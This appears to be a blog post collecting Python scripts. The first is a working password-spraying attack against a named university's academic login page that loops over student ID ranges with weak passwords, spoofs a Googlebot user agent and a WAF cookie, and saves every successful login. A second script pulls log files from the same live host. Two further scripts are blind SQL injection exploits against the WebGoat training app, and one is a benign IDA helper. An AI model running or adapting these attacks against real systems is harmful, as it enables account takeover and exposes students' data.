
Python script backup

De4dCr0w
Published 2019-02-27 15:37:14
This article is included in the column: Binary Vulnerability Research

Zhengfang academic affairs system: weak passwords

#coding:utf-8
import requests

url = 'http://zfjw.tjykdxlcyxy.cn/(2izend4512fei5nhksssaw45)/default4.aspx'  # Tianjin Medical University Clinical Medical College, Zhengfang academic affairs system

#username = 1604020408
weak = ['000000',
'111111',
'222222',
'333333',
'444444',
'555555',
'666666',
'777777',
'888888',
'999999',
'123456',
'654321',
'qweqwe',
'123123'
]

for i in range(1604020000,1604029999):
    for j in weak:
        username = str(i)
        print username
        passwd = str(j)
        data = {
        "__VIEWSTATE":"dDwxMTE4MjQwNDc1Ozs+/qN9q0GVi7WN0iH/jz8h6QhLSvg=",
        "TextBox1":username,
        "TextBox2":passwd,
        "RadioButtonList1":"学生",
        "Button1":" 登 录 "
        }
        #cookies = {}
        headers = {"Host":"zfjw.tjykdxlcyxy.cn",
        "User-Agent":"Googlebot/2.1 (+http://www.google.com/bot.html)",
        "Referer":"http://zfjw.tjykdxlcyxy.cn/(2izend4512fei5nhksssaw45)/default4.aspx",
        "Cookie":"safedog-flow-item=",
        }
        req = requests.post(url=url,data=data,headers=headers)
        #print req.content
        if req.content.find('alert') == -1:
            f = open(username+'_'+passwd+'.txt','w')
            print >> f,req.content
            #print req.content
            f.close()

Zhengfang academic affairs system: log download

import requests
import datetime

begin = datetime.date(2017,5,1)
end = datetime.date(2017,5,1)

for i in range((end - begin).days+1):
    day = begin+datetime.timedelta(days=i)
    url = 'http://zfjw.tjykdxlcyxy.cn/log/%s-log.txt'%str(day)
    #print url 

    req = requests.get(url)

#print req.content

    if req.content.find('passwd') == -1:
        print day
        f = open(str(day)+".txt","w")
        print >> f,req.content
        f.close()

IDA: highlighting call instructions

from idautils import *
from idc import *

heads = Heads(SegStart(ScreenEA()),SegEnd(ScreenEA()))

functionCalls = []

for i in heads:
    if GetMnem(i) == "call":
        functionCalls.append(i)
print "Number of calls found: %d"%(len(functionCalls))

for i in functionCalls:
    SetColor(i,CIC_ITEM,0xc7fdff)

WebGoat numeric blind injection

import re
import requests
import time

cookies = dict(JSESSIONID='A9DDDE87B8D317640143AD42C8AB0CFB')

url = 'http://localhost:8080/WebGoat/attack?Screen=586116895&menu=1100'

#payload = "101 and 1=2"
low = 0
high = 10000
mid = 5000
payload = "101 and ((select pin from pins where cc_number='1111222233334444')="+str(mid)+")"
print payload
data = {'account_number':payload,'SUBMIT':'Go!'}
req = requests.post(url=url,data=data,cookies=cookies)
print req.content

while low <= high:  # binary search
    mid = (low+high)/2
    payload = "101 and ((select pin from pins where cc_number='1111222233334444')="+str(mid)+")"
    print payload
    data = {'account_number':payload,'SUBMIT':'Go!'}
    req = requests.post(url=url,data=data,cookies=cookies)
    if req.content.find('Account number is valid.') != -1:
        print 'succeed:'+str(mid)
        break
    time.sleep(1)
    payload = "101 and ((select pin from pins where cc_number='1111222233334444')>"+str(mid)+")"
    data = {'account_number':payload,'SUBMIT':'Go!'}
    req = requests.post(url=url,data=data,cookies=cookies)
    print req.content
    if req.content.find('Invalid account number.') != -1:
        high = mid-1
    elif req.content.find('Account number is valid.') != -1:
        low = mid+1
else:
    # reached only when the search range is exhausted without a match
    print 'it\'s over,not found!'

WebGoat string blind injection

import re
import requests
import time

cookies = dict(JSESSIONID='A9DDDE87B8D317640143AD42C8AB0CFB')

url = 'http://localhost:8080/WebGoat/attack?Screen=586116895&menu=1100'

#payload = "101 and 1=2"
charset = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
k = 1
for j in range(0,5):
    for i in charset:
        payload = "101 and (substring((select name from pins where cc_number='4321432143214321'),%d,1)='%c')"% (k,i)
        #print payload
        data = {'account_number':payload,'SUBMIT':'Go!'}
        req = requests.post(url=url,data=data,cookies=cookies)
        #print req.content
        if req.content.find('Invalid account number') != -1:
            continue
        elif req.content.find('Account number is valid.') != -1:
            print i,
            k = k+1

print ''
print 'it\'s over,not found!'